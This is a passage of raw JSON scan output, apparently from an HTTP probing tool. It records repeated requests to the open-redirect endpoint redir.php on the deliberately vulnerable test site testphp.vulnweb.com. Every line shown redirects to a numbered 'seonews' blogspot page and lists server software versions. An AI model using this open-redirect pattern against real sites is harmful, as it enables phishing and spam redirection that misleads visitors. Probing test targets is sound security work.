.php?r=http://seonews1172.blogspot.com/management.html\",\"time\":\"362.334402ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:24.761499058Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1178.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1178.blogspot.com/management.html\",\"location\":\"http://seonews1178.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1178.blogspot.com/management.html\",\"time\":\"348.713688ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:24.766928415Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1182.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1182.blogspot.com/management.html\",\"location\":\"http://seonews1182.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1182.blogspot.com/management.html\",\"time\":\"346.834291ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:25.082960204Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1205.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1205.blogspot.com/management.html\",\"location\":\"http://seonews1205.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1205.blogspot.com/management.html\",\"time\":\"344.439889ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:25.132930159Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1229.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1229.blogspot.com/management.html\",\"location\":\"http://seonews1229.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1229.blogspot.com/management.html\",\"time\":\"339.883318ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:25.162816933Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1245.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1245.blogspot.com/management.html\",\"location\":\"http://seonews1245.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1245.blogspot.com/management.html\",\"time\":\"355.963913ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:25.244372427Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1261.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1261.blogspot.com/\",\"location\":\"http://seonews1261.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1261.blogspot.com/\",\"time\":\"350.523397ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:25.259077025Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1268.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1268.blogspot.com/management.html\",\"location\":\"http://seonews1268.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1268.blogspot.com/management.html\",\"time\":\"351.958819ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:25.371503348Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1277.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1277.blogspot.com/management.html\",\"location\":\"http://seonews1277.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1277.blogspot.com/management.html\",\"time\":\"352.188852ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:25.404821892Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1410.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1410.blogspot.com/management.html\",\"location\":\"http://seonews1410.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1410.blogspot.com/management.html\",\"time\":\"348.216091ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:25.46446414Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1414.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1414.blogspot.com/\",\"location\":\"http://seonews1414.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1414.blogspot.com/\",\"time\":\"354.416063ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:25.510740944Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1461.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1461.blogspot.com/management.html\",\"location\":\"http://seonews1461.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1461.blogspot.com/management.html\",\"time\":\"343.097865ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:25.593370701Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1473.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1473.blogspot.com/management.html\",\"location\":\"http://seonews1473.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1473.blogspot.com/management.html\",\"time\":\"347.301826ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:25.674253813Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1479.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1479.blogspot.com/management.html\",\"location\":\"http://seonews1479.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1479.blogspot.com/management.html\",\"time\":\"350.819429ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:25.781871404Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1482.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1482.blogspot.com/\",\"location\":\"http://seonews1482.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1482.blogspot.com/\",\"time\":\"347.234313ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:28.926961581Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1495.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1495.blogspot.com/management.html\",\"location\":\"http://seonews1495.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1495.blogspot.com/management.html\",\"time\":\"347.784964ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:29.14439279Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1496.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1496.blogspot.com/management.html\",\"location\":\"http://seonews1496.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1496.blogspot.com/management.html\",\"time\":\"351.654921ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:29.177205488Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1500.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1500.blogspot.com/\",\"location\":\"http://seonews1500.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1500.blogspot.com/\",\"time\":\"339.124978ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:29.229190573Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1500.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1500.blogspot.com/management.html\",\"location\":\"http://seonews1500.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1500.blogspot.com/management.html\",\"time\":\"338.817854ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:29.633446009Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1502.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1502.blogspot.com/\",\"location\":\"http://seonews1502.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1502.blogspot.com/\",\"time\":\"349.143983ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:30.041252993Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1504.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1504.blogspot.com/\",\"location\":\"http://seonews1504.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1504.blogspot.com/\",\"time\":\"354.65526ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:30.071260454Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1505.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1505.blogspot.com/management.html\",\"location\":\"http://seonews1505.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1505.blogspot.com/management.html\",\"time\":\"344.644563ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:30.250050004Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1508.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1508.blogspot.com/management.html\",\"location\":\"http://seonews1508.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1508.blogspot.com/management.html\",\"time\":\"358.225792ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:30.783745829Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1509.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1509.blogspot.com/\",\"location\":\"http://seonews1509.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1509.blogspot.com/\",\"time\":\"351.24805ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:30.832675101Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1509.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1509.blogspot.com/management.html\",\"location\":\"http://seonews1509.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1509.blogspot.com/management.html\",\"time\":\"356.957091ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:32.566668126Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1510.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1510.blogspot.com/management.html\",\"location\":\"http://seonews1510.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1510.blogspot.com/management.html\",\"time\":\"350.900283ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:33.798281794Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1513.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1513.blogspot.com/\",\"location\":\"http://seonews1513.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1513.blogspot.com/\",\"time\":\"344.323618ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:33.858216726Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1514.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1514.blogspot.com/\",\"location\":\"http://seonews1514.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1514.blogspot.com/\",\"time\":\"352.209266ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:34.203119859Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1515.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1515.blogspot.com/management.html\",\"location\":\"http://seonews1515.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1515.blogspot.com/management.html\",\"time\":\"352.485028ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:35.028118892Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1517.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1517.blogspot.com/\",\"location\":\"http://seonews1517.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1517.blogspot.com/\",\"time\":\"343.936563ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:35.055508227Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1518.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1518.blogspot.com/\",\"location\":\"http://seonews1518.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1518.blogspot.com/\",\"time\":\"343.086055ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:35.111205141Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1518.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1518.blogspot.com/management.html\",\"location\":\"http://seonews1518.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1518.blogspot.com/management.html\",\"time\":\"347.942029ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:35.113383183Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1519.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1519.blogspot.com/\",\"location\":\"http://seonews1519.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1519.blogspot.com/\",\"time\":\"344.370978ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:35.441463726Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1519.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1519.blogspot.com/management.html\",\"location\":\"http://seonews1519.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1519.blogspot.com/management.html\",\"time\":\"356.544369ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:35.47726814Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1520.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1520.blogspot.com/management.html\",\"location\":\"http://seonews1520.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1520.blogspot.com/management.html\",\"time\":\"342.808254ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:35.524834143Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1521.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1521.blogspot.com/management.html\",\"location\":\"http://seonews1521.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1521.blogspot.com/management.html\",\"time\":\"360.247679ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:35.597782453Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1522.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1522.blogspot.com/\",\"location\":\"http://seonews1522.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1522.blogspot.com/\",\"time\":\"351.910833ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\